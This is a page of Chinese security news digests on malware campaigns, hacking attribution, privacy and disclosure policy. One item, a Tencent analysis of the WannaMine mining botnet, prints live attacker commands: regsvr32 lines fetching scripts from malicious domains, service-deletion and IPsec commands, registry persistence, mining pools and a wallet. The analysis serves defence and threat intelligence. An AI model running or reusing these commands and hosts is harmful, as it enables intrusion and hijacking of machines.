分类: 今日推送

伪装为 WAV 的恶意软件在受害设备上挖矿 但其 bug 导致 BSOD

Guardicore的安全研究人员揭示了一种复杂的恶意软件攻击,该攻击成功地破坏了属于医疗技术行业中型公司的800多种设备。恶意软件伪装成WAV文件,并包含一个Monero挖矿软件,它利用臭名昭著的EternalBlue漏洞来危害网络中的设备。 这款恶意软件唯一的bug,是最终导致受感染的电脑蓝屏死亡(BSOD),并且显示相关错误代码,最终引起受害者怀疑,并引发对事件的深入调查。 研究人员表示,BSOD于10月14日首次发现,当时发生致命崩溃的机器正在尝试执行长命令行(实际上是基于base-64编码的PowerShell脚本)。对脚本进行解码后,研究人员获得了可读的Powershell脚本,该脚本用于部署恶意软件。该脚本首先检查系统架构(基于指针大小)。然后,它读取存储在上述注册表子项中的值,并使用Windows API函数WriteProcessMemory将该值加载到内存中。研究人员指出,恶意软件负载通过获取和调用函数指针委托来执行。 该恶意软件尝试使用基于EternalBlue的漏洞传播到网络中的其他设备,该漏洞与WannaCry于2017年使用的漏洞相同,感染了全球数千台电脑。在对恶意软件进行反向工程之后,研究人员发现该恶意软件实际上隐藏了伪装成WAV文件的Monero挖矿模块,使用CryptonightR算法来挖掘Monero虚拟货币。此外,该恶意软件利用隐写术并将其恶意模块隐藏在外观清晰的WAV文件中。” 研究人员发现,完全删除恶意软件(包括终止恶意进程)阻止了在受害设备上发生BSOD。   (稿源:cnBeta,封面源自网络。)

外媒评俄罗斯攻击 Burisma 一事:证据不完全可靠

据外媒报道,2016年美国民主党全国委员会灾难性的黑客攻击给所有担心国际混乱竞选的人敲响了警钟。当地时间周一晚,美国人又有了一个担心2020年大选的新理由。《纽约时报》和网络安全公司Area1报道了俄罗斯情报机构针对乌克兰天然气公司Burisma发起的新一轮黑客攻击。 几个月来,共和党方面一直在暗示该公司内部存在一些可怕的腐败行为,如果俄罗斯间谍真的侵入了这家公司的网络那么可能就会带来非常可怕的后果。 一些国会议员则已经在预测2016年大选将会重演,民主党众议员Adam Schiff评论道:“看起来他们又想帮助这位总统(特朗普)。这是一个令人担忧的想法,考虑到特朗普上次拒绝承认俄罗斯的黑客行为,没有迹象表明白宫会采取任何措施来阻止它。” 尽管报告描绘了一幅可怕的画面,但证据并不像看上去那么确凿。虽然已经有强有力的证据表明Burisma成功地成为了网络钓鱼活动的目标,但很难确定是谁在背后支持这个活动。确实有迹象表明,俄罗斯的GRU情报机构可能参与其中,但证据大多是间接的。 据了解,大部分证据都在一份跟《纽约时报》文章一起发布的八页报告中。核心证据是以前针对Hudson Institute和George Soros的攻击模式。最糟糕的是,这些钓鱼活动都使用了相同的SSL供应商和相同URL的不同版本然后伪装成一个名为“My Sharepoint”的服务。在Area1看来,这是GRU的战术,Burisma只是众多目标中最新的一个。 但并不是所有人都认为基于域名属性的推断就是十拿九稳的。当Kyle Ehmke检查ThreatConnect相同模式的早期迭代时,他得出了一个更为慎重的结论,即“适度自信”地评估这些域名跟APT28有关–APT28是俄罗斯GRU的缩写。“我们看到了一致性,但在某些情况下,这些一致性并不适用于单个演员,”Ehmke告诉TheVerge。这种注册和网络钓鱼攻击的模式确实像是GRU的剧本,但它不是唯一的剧本也不是其利用的唯一剧本。 实际上,这意味着网络运营商应该在任何时候发现符合这种情况的攻击时发出警报,但要对单个事件做出明确的裁决就显得困难得多。竞选活动中使用的网络基础设施都是公开的,而且还被其他很多政党使用,所以这些都不能算是确凿的证据。而最显著的特征是术语“sharepoint”,研究人员只在跟GRU紧密相连的url中看到过这个词。但任何人都可以注册一个带有“sharepoint”的URL,所以这种连接只是间接的。 Ehmke指出:“这是一组值得注意的一致性,它可以用来寻找和识别他们的基础设施。但这并不是说所有具有这些一致性的东西都已经是而且将会是APT28。” 在缺乏一个特定机构的战略和目标的具体信息的情况下很难做出更强的归因。走向相反的方向–从一个弱归因到一个意图的假设–可能是危险的。 令人沮丧的是,这种弱归因在网络安全世界中非常常见,当各国努力搞清楚网络战的国际外交时它可能会引发真正的问题。乔治亚理工学院Internet Governance Project前执行董事Farzaneh Badii把原因不明归为“可以在技术上受到质疑的间接证据”。她认为这是一个全球性的问题,并主张成立国际归因小组来解决这种僵局,这样观察员就不必依赖私营公司或政府情报机构。如果没有这个信任问题就很难解决。   (稿源:cnBeta,封面源自网络。)

安全公司发现俄黑客成功入侵 Burisma 网络:或对美大选产生干扰

据《纽约时报》报道,硅谷一家名为Area1的安全公司表示,他们发现有迹象表明,由国家资助的俄罗斯黑客成功入侵了乌克兰天然气公司Burisma。该公司在美国政治中扮演了核心角色,因为它跟民主党总统候选人领跑者约瑟夫·拜登关系密切。拜登的儿子亨特则是该公司的董事。 约瑟夫·拜登资料图 今年7月,特朗普总统要求乌克兰政府调查Burisma事件以找出有关拜登家族的破坏性信息。据称,特朗普曾威胁称,如果乌克兰总理不宣布展开调查,他将停止对乌克兰的军事援助。这一要求是总统正在进行的弹劾程序的核心,这也使得Burisma成为任何试图干涉美国政治的人的诱人目标。 而据安全公司Area1披露,他们发现了发送给Burisma员工的钓鱼邮件,这些邮件带有GRU黑客活动的许多特征。这些黑客显然成功获取了员工的登录信息,不过目前还不清楚他们究竟获取了多少信息。如果GRU真的有参与其中,那么该组织可能会在2020年总统大选期间曝出令人尴尬的信息。 据了解,在攻击Burisma的过程中,俄罗斯黑客可能采取了跟2016年大选期间其破坏希拉里·克林顿总统竞选活动类似的手段。   (稿源:cnBeta,封面源自网络。)  

50 多家组织致信谷歌:允许用户卸载所有 Android 预装应用程序

包括国际隐私组织、数字权利基金会,DuckDuckGo和电子前沿基金会在内的50多个组织,近日向Alphabet和Google首席执行官Sundar Pichai发出公开信,就Android设备预装软件所存在的漏洞以及它们如何给消费者带来隐私风险表明了自己的立场。 在这封公开信中,这些组织表示所有Android OEM厂商都在其设备上预装了无法删除的应用程序,并且具备厂商定值的特殊权限,因此可以绕过Android的权限模型。 这使的这些预装应用程序可以在没有用户干预的情况下,就能访问麦克风、摄像头、定位以及其他权限。这也导致很多智能手机OEM厂商可以在没有征得用户明确许可的情况下收集用户数据,并用于其他利益。 因此,这些组织希望谷歌对Android预装应用程序(Bloatware)采取一些调整,并希望公司能够为用户提供永久卸载设备上所有预装应用程序的功能。虽然可以在Android设备上禁用某些预加载的应用程序,但它们仍会继续运行某些后台进程,这使得禁用它们成为一个争论的焦点。 公开信中要求确保所有预装应用程序能够和常规应用程序一样罗列在Google Play应用商城中,并进行相同的审查。他们还希望即使设备没有用户登录,也可以通过Google Play更新所有预安装的应用。如果Google检测到OEM试图利用用户的隐私及其数据,则出于隐私和保护用户数据方面的考量拒绝认证该设备。 Google在Android 10中进行了许多针对隐私的更改,但仍有很多地方可以进行完善,帮助用户免受预装应用程序的侵害。   (稿源:cnBeta,封面源自网络。)

谷歌 Project Zero 团队宣布新政策 漏洞披露前将有完整的90天缓冲期

谷歌 Project Zero 团队以披露大量严重漏洞而被人们所熟知,但也因为严格的快速披露政策而遭到了行业内的批评。于是 2020 年的时候,谷歌安全团队试图制定新的政策,将问题披露的宽限期给足了整整 90 天。即便如此,谷歌还是对过去五年的政策表现感到满意,指出有 97.9% 的漏洞报告在当前的 90 天披露政策下得到了有效的修复。 相比之下,2014 年有些 bug 拖了六个月、甚至更长的时间来解决。不过在审查了“复杂且经常引起争议”的漏洞披露政策之后,谷歌还是决定在 2020 年做出一些改变。 那些易被曝光漏洞的企业,将被给予默认 90 天的缓冲时间,而无论其将于何时修复相关 bug 。若企业顺利或提前完成了修复,也可以与谷歌 Project Zero 取得联系,以提前公布漏洞详情。 ● 厂家在 20 天内修复了 bug?谷歌将在第90天公布漏洞详情; ● 厂家在 90 天内修复了 bug?谷歌也将在第 90 天公布漏洞详情! 当然,在争取推动“更快的补丁开发”流程的同时,Project Zero 还希望全面提升补丁程序的采用率。 现有政策下,谷歌希望供应商能够快速开发补丁,并制定适当的流程,以将之交付给最终客户,我们将继续紧迫地追求这一点。 然而有太多次,供应商只是简单的记录了漏洞,而不考修改或从根本上修复已曝光的漏洞。有鉴于此,Project Zero 团队希望推动更快的补丁开发,以防别有用心者轻易地向用户发动大大小小的攻击。 改进后的新政策指出,发现漏洞之后,最终用户的安全性不会就此得到改善,直到 bug 得到适当的修复。只有最终用户意识到相关 bug,并在他们的设备上实施了修补,才能够从漏洞修复中得到益处。 最后,在新政策转入“长期实施”之前,Google 将给予 12 个月的试用。   (稿源:cnBeta,封面源自网络。)

挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点: 利用“永恒之蓝”漏洞攻击传播; 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动; 通过添加IP策略阻止本机连接对手木马的47个矿池,阻止其他病毒通过“永恒之蓝”漏洞入侵; 添加计划任务,WMI事件消费者进行持久化攻击,删除“MyKings”病毒的WMI后门; 利用COM组件注册程序regsvr32执行恶意脚本; 利用WMIClass存取恶意代码; 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’, ‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令: regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段JScript脚本,功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下: 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化: 旧版: 备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址:172.247.116.8 默认端口:8000 核心Powershell:in6.ps1,in3.ps1 新版: 备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址:skt.xiaojiji.nl 默认端口:80 核心Powershell:network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行 http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1 RunDDOS(Gh0st远控木马) Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。 分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见,技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam.txt下载二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务: sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性: attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP网络连接,从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。 然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下: DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。 使用以下矿池: xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包: 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点,我们建议企业采取以下措施加以防范: 使用安全的密码策略,切勿使用弱口令; 及时修复Windows系统漏洞,推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞,亦可参考以下链接重点修复永恒之蓝相关漏洞;(1)MS17-010永恒之蓝漏洞补丁下载地址:(2)XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598(3)Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的指定IP连接登陆; 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器; 当系统出现异常时,检查计划任务和WMI(可用WMITools.exe)中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接: WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃,14万台linux系统受攻击

新发现!FIN7 的新型装载程序应用在 Carbanak 后门

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序,该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现,被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃,活动目标是窃取全球范围内的企业支付卡信息,目前疑似已经袭击了100多家美国公司,袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月,臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉,并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外,BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看,BOOSTWRITE也是一个与FIN7组织相关联的加载程序,它也能够将恶意软件直接放入内存,但BIOLOAD通过二进制植入技术,采用dll的劫持方法,将恶意代码加载到合法程序中。 在研究过程中,Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库,这个链接库从windows 10 1803中开始清理安装Windows OS.此外,研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看,BIOLOAD装载机样本于分别2019年3月和7月进行了编制,而BOOSTWRITE样本于5月编制。在加载器上,BIOLOAD不支持多个有效载荷,而使用XOR来解密有效载荷,并不是ChaCha密码。在秘钥连接上,BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示,BIOLOAD加载器主要被用来进行程序攻击,并进行Carbank病毒传输。专家发现,这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明:BIOLOAD是由FIN7网络犯罪集团开发的,很可能是BOOSTWRITE的前身。 Fortinet因此得出结论:“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件,Fin7拥有最新工具的共享代码库,以及同样的技术和后门,导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议:由于加载程序是专门为每台目标计算机构建的,需要管理权限才能部署,因此建议相关部门要注意收集有关目标网络的信息。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

OilRig 伊朗威胁组织伪装合法的思科工具 安装 Poison Frog 后门

臭名昭著的OilRig伊朗威胁组织通过使用各种PowerShell脚本将恶意软件伪装成合法的Cisco AnyConnect应用程序,以安装Poison Frog后门程序。 Poison Frog是OilRig集团武器库中最强大的后门之一,它包含一个面板,面板上有服务器端部件和PowerShell中曾用于各种备受关注网络攻击的Payload。 卡巴斯基研究人员还发现了一个新样本,它是一个用C语言编写的PE可执行文件,只有删除包含后门Powershell脚本的功能。在同样的逻辑下,还发现了另一个PowerShell脚本,它有两个不同的长字符串,包含DNS和HTTP后门也就是Poison Frog后门。 为了安装恶意软件,OilRig威胁组织成员还巧妙使用了计俩,将恶意软件伪装成合法的Cisco AnyConnect应用程序。 卡巴斯基研究人员发表报告称“信息弹出窗口会在每次点击时出现,起到欺瞒用户的作用,使用户误认为是应用程序或互联网的接入有问题,而实际上却是在悄悄的将后门安装在系统上。”   消息来源:gbhackers, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文  

美国大学用手机监控数十万名学生的位置 督促学习

12月26日消息,据外媒报道,通过使用短程手机传感器和覆盖整个校园的WiFi网络,美国各地大学能够比以往任何时候都更精确地跟踪数十万名学生位置。如今,数十所美国大学正使用这种技术来监控学生的学习表现,分析他们的行为或评估他们的心理健康情况。 以雪城大学为例,当新生走进杰夫·鲁宾教授(Jeff Rubin)的信息技术导论课时,格兰特礼堂报告厅周围隐藏的七个蓝牙信标会与他们智能手机上的一款应用程序SpotterEDU相连,以此督促他们出勤。SpotterEDU还会记录学生逃课情况,将他们的缺席记录传到校园数据库中,这可能会降低他们的成绩。这款应用还能提醒鲁宾教授联系学生,询问他们去了哪里。 鲁宾表示:“我的课程很少有人缺席。学生们想要获得学分,他们知道我在关注他们,并会对此采取行动。所以,他们会主动改变自己的行为。” 对于校园跟踪系统是否侵犯隐私,学生们意见不一,有些人认为他们没有什么可隐瞒的。但有的学生抱怨称:“我们都是成年人了,真的需要被继续追踪吗?这有什么必要呢?对我们有什么好处?这种情况会持续下去,直到我们每分每秒都得到微观管理吗?“ 不论是否支持校园跟踪系统,几乎所有人都有这样的感觉:这项技术正在变得无处不在,而被监控的人实际上对此无能为力。 许多教育倡导者认为,这些监控系统代表了新的侵入性技术,大规模侵犯了学生的隐私。他们担心,这种追踪系统会让学生在他们长大成人的地方显得幼稚,导致他们把监控视为生活的正常部分,不管他们喜欢与否。此外,这也会破坏学生的独立性,阻止他们培养业余兴趣爱好,因为他们担心自己时刻受到监视。     (稿源:网易科技,封面源自网络。)

Maze 勒索软件公布从彭萨科拉市盗取的文件

Maze勒索软件近期发布2GB的文件,有消息称这些文件正是从彭萨科拉市所盗取。 本月彭萨科拉市遭到勒索软件攻击,该市的通信系统受到影响,网络系统几近瘫痪。据Bleeping Computer证实,这一事件的发生正是因为受到Maze勒索软件的攻击。昨天,Maze勒索软件也发布了32GB文件中的2GB文件,他们声称这些文件来源于在加密网络前就已盗取该市的网络数据,若想解密数据,需花费赎金100万美元。 在Bleeping Computer与Maze相关黑客人员的商讨中,Maze方透露,他们所盗取的文件远不止发布的2GB. “这是媒体报道的错误,我们所盗取的数据远不止如此,我们也不想给这座城市造成压力,也早已表明了真实的意图,但现在还没到我们想到的预期。” 当Bleeping Computer询问他们是否打算发布其余的数据时,他们的回答是“这取决于彭萨科拉市政府”。   消息来源:bleepingcomputer, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文